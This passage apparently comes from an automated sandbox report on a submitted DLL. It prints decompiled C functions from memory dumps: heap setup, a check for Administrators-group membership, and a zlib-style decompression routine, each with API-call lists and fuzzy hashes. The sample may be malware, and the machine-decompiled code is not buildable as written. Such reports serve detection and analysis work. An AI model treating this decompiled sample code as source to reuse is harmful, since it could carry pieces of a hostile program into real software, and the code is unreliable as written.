									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}










                                                                                                                                                                                                0x1000cd08
                                                                                                                                                                                                0x1000cd0b
                                                                                                                                                                                                0x1000cd10
                                                                                                                                                                                                0x1000cd13
                                                                                                                                                                                                0x1000cd15
                                                                                                                                                                                                0x1000cd15
                                                                                                                                                                                                0x1000cd15
                                                                                                                                                                                                0x1000cd18
                                                                                                                                                                                                0x1000cd1a
                                                                                                                                                                                                0x1000cd21
                                                                                                                                                                                                0x1000cd29
                                                                                                                                                                                                0x1000cd2c
                                                                                                                                                                                                0x1000cd36
                                                                                                                                                                                                0x1000cd3c
                                                                                                                                                                                                0x1000cd3c
                                                                                                                                                                                                0x1000cd41
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000cd46
                                                                                                                                                                                                0x1000cd47
                                                                                                                                                                                                0x1000cd4e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000cd50
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000cd4e
                                                                                                                                                                                                0x1000cd55
                                                                                                                                                                                                0x1000cd55
                                                                                                                                                                                                0x1000cd57
                                                                                                                                                                                                0x1000cd57
                                                                                                                                                                                                0x1000cd58
                                                                                                                                                                                                0x1000cd5b
                                                                                                                                                                                                0x1000cd5b
                                                                                                                                                                                                0x1000cd60
                                                                                                                                                                                                0x1000cd68
                                                                                                                                                                                                0x1000cd74

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC4F,?,?), ref: 1000CD36
                                                                                                                                                                                                • Sleep.KERNELBASE(0000000A,00000000,?,?,?,1000AC4F,?,?), ref: 1000CD68
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Sleeplstrcmpi
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1261054337-0
                                                                                                                                                                                                • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                                                                                                                                                                                                • Instruction ID: f37a54f2d194e92077bc8e4b7c436761f4679303faf6b7a6905cf7e87245eca0
                                                                                                                                                                                                • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 82018031600709AFEB14CF69C8C4D59BBE5FF843A8721C07AE5698B225D330E942DF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10005E77, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E10005E77() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x4d2f878
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}




                                                                                                                                                                                                0x10005e77
                                                                                                                                                                                                0x10005e84
                                                                                                                                                                                                0x10005e8e

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 10005E8E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                                                                                                                                                                                                • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                                                                                                                                                                                                • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 100085D0, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E100085D0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}




                                                                                                                                                                                                0x100085d9
                                                                                                                                                                                                0x100085df
                                                                                                                                                                                                0x100085e4

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F88), ref: 100085D9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                                                                • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                                                                                                                                                                                                • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000BAA4, Relevance: 1.3, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                			E1000BAA4(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B988(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B9DA(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E100085FB( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x4d2fa40
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x4d2fa40
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x4d2fa40
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                                                                                                                                                                                                0x1000baab
                                                                                                                                                                                                0x1000baad
                                                                                                                                                                                                0x1000bab4
                                                                                                                                                                                                0x1000bab6
                                                                                                                                                                                                0x1000bab9
                                                                                                                                                                                                0x1000babe
                                                                                                                                                                                                0x1000bac3
                                                                                                                                                                                                0x1000bacd
                                                                                                                                                                                                0x1000bad0
                                                                                                                                                                                                0x1000bad3
                                                                                                                                                                                                0x1000bad8
                                                                                                                                                                                                0x1000bada
                                                                                                                                                                                                0x1000bae0
                                                                                                                                                                                                0x1000bb40
                                                                                                                                                                                                0x1000bb48
                                                                                                                                                                                                0x1000bb4e
                                                                                                                                                                                                0x1000bb55
                                                                                                                                                                                                0x1000bb5b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000bb5c
                                                                                                                                                                                                0x1000bae5
                                                                                                                                                                                                0x1000bae6
                                                                                                                                                                                                0x1000bae7
                                                                                                                                                                                                0x1000bae8
                                                                                                                                                                                                0x1000bae9
                                                                                                                                                                                                0x1000baea
                                                                                                                                                                                                0x1000baeb
                                                                                                                                                                                                0x1000baec
                                                                                                                                                                                                0x1000baf1
                                                                                                                                                                                                0x1000baf3
                                                                                                                                                                                                0x1000baf8
                                                                                                                                                                                                0x1000baf9
                                                                                                                                                                                                0x1000bb03
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000bb07
                                                                                                                                                                                                0x1000bb33
                                                                                                                                                                                                0x1000bb33
                                                                                                                                                                                                0x1000bb3b
                                                                                                                                                                                                0x1000bb3e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000bb3e
                                                                                                                                                                                                0x1000bb09
                                                                                                                                                                                                0x1000bb09
                                                                                                                                                                                                0x1000bb0c
                                                                                                                                                                                                0x1000bb0f
                                                                                                                                                                                                0x1000bb0f
                                                                                                                                                                                                0x1000bb12
                                                                                                                                                                                                0x1000bb14
                                                                                                                                                                                                0x1000bb1e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000bb23
                                                                                                                                                                                                0x1000bb24
                                                                                                                                                                                                0x1000bb27
                                                                                                                                                                                                0x1000bb2c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000bb2e
                                                                                                                                                                                                0x1000bb32
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000bb32
                                                                                                                                                                                                0x1000bb61

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 1000B988: GetCurrentThread.KERNEL32 ref: 1000B99B
                                                                                                                                                                                                  • Part of subcall function 1000B988: OpenThreadToken.ADVAPI32(00000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9A2
                                                                                                                                                                                                  • Part of subcall function 1000B988: GetLastError.KERNEL32(?,?,1000BABE,74E5F500,10000000), ref: 1000B9A9
                                                                                                                                                                                                  • Part of subcall function 1000B988: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9C2
                                                                                                                                                                                                  • Part of subcall function 1000B988: OpenProcessToken.ADVAPI32(00000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9C9
                                                                                                                                                                                                  • Part of subcall function 1000B9DA: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74E5F500,00000000,10000000,00000000,00000000,?,1000BA79,?,00000000,?,1000D0EA), ref: 1000B9F5
                                                                                                                                                                                                  • Part of subcall function 1000B9DA: GetLastError.KERNEL32(?,1000BA79,?,00000000,?,1000D0EA), ref: 1000B9FC
                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,00000000,74E5F500,10000000), ref: 1000BB48
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Token$CurrentErrorLastOpenProcessThread$CloseHandleInformation
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1020899596-0
                                                                                                                                                                                                • Opcode ID: 7496030081f187c3be82d862b0638c4536d53a25532959bdc46a17bfd4f9878a
                                                                                                                                                                                                • Instruction ID: 879b9df3aaa00c0659358d6a91e28364aef497fa3115ff5a30bcbe7a213f7874
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7496030081f187c3be82d862b0638c4536d53a25532959bdc46a17bfd4f9878a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 22215E71A00619AFEB00DFA9DC85E9EB7F8FF44790B518069F641E7259D770EE018B50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 100085E5, Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E100085E5(long _a4) {
				void* _t2;

				_t2 = HeapAlloc( *0x1001e768, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                0x100085f3
                                                                                                                                                                                                0x100085fa

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                • Opcode ID: 8fa3f0636157d6f724efeb9e6e061b1388aa9a5b26bf0cb6cb48d2cfaead2726
                                                                                                                                                                                                • Instruction ID: 98384dcc60fbf452174263320f9adba220b6aef63daea83b52f76a11741f2994
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fa3f0636157d6f724efeb9e6e061b1388aa9a5b26bf0cb6cb48d2cfaead2726
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EB09235084A1CBBFE821B81DD85A887F69EB08755F008010F608090B0CA72AA649B80
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 100153BF, Relevance: 8.1, Strings: 6, Instructions: 577COMMONCrypto
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                			E100153BF(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x1001d040 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x1001d040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x1001d040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x1001d040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x1001d040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x1001533c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x1001533c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
